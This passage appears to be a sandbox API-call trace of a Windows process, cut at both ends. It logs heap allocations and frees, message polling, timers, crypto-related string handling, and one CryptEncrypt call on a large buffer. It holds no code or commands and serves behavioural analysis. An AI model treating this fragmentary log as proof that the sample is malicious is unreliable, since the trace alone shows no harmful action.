Flags=0x0, Size=0x4) returned 0x2e54f88 [0220.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0220.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0220.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0220.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0220.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.483] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0220.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0220.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0220.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51550 [0220.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51550, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.486] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e91d20*, pdwDataLen=0x8cef60*=0x119e6, dwBufLen=0x119e8 | out: pbData=0x2e91d20*, pdwDataLen=0x8cef60*=0x119e8) returned 1 [0220.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0220.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0220.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0220.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0220.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0220.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0220.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0220.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0220.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0220.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0220.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0220.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0220.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0220.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0220.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0220.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ea3710 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0220.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2eb5100 [0220.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x970000) returned 1 [0220.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0220.656] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0220.656] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0220.656] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0220.657] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0220.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0220.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.657] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0220.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0220.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.658] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.658] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: 